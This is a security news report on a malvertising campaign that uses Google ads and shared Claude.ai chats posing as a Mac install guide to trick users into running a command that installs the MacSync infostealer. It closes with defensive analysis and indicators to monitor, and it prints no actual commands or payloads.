Hackers Use Google Ads and Claude.ai to Deliver Mac Malware

Security researcher Berk Albayrak of Trendyol Group first identified an active malvertising campaign in May 2026 that uses Google Ads to surface sponsored search results appearing to point at Claude.ai, then leads victims into publicly shared Claude.ai chats containing malicious installation instructions, according to reporting by BleepingComputer and ITSecurityNews. Multiple security outlets, including Bitdefender and AdGuard, corroborated that victims searching for phrases like "Claude mac download" may be shown sponsored links that arrive at legitimate claude.ai pages but display chat content instructing users to paste a one-line Terminal command. CyberSecSentinel reported that the campaign delivered data-stealing malware and attributed a cluster to the MacSync infostealer, and it published an estimate of 15,600+ confirmed victims.

BleepingComputer and AdGuard documented that the malicious chats present as an official "Claude Code on Mac" installation guide, sometimes claiming attribution to "Apple Support," and instruct users to open Terminal and paste a base64-encoded command. The command downloads and executes a remote shell script from attacker-controlled domains, which then decodes and runs a payload. CyberSecSentinel and AdGuard detail that the observed MacSync variant harvests browser-stored credentials, cookies, macOS Keychain entries, and cryptocurrency wallet data, bundles exfiltrated artifacts (reported as files like /tmp/osalogging.zip), and uploads them to operator-controlled command-and-control endpoints. Multiple reporting outlets noted the campaign used separate infrastructure clusters and rotated malicious chats and domains to evade simple takedowns and hash-based detection.

Editorial analysis: Attackers increasingly combine two trust vectors - paid search results and legitimate public content features - to raise perceived authenticity. Observed patterns in recent malvertising incidents show that when an advertised link resolves to an accepted platform domain, detection that relies on domain- or certificate-based heuristics is less effective. For practitioners, the consequence is that social-engineered copy-paste workflows, often invoked during developer-oriented installs, remain a high-risk infection vector because they rely on user action rather than software vulnerabilities.

Editorial analysis: Observers should track whether security vendors or platform operators publish takedown reports, whether Google updates its ad verification and landing page review processes, and whether AI platforms revise default sharing permissions or impose stricter content moderation on public chats. Indicators to monitor include multiple sponsored ad entries pointing to the same legitimate domain but resolving to differing chat content, reports of base64-encoded shell-command installers in public chats, and C2 domains named in vendor telemetry. Security teams should also scan for lateral signs of credential exfiltration consistent with the behaviors reported by CyberSecSentinel and Bitdefender.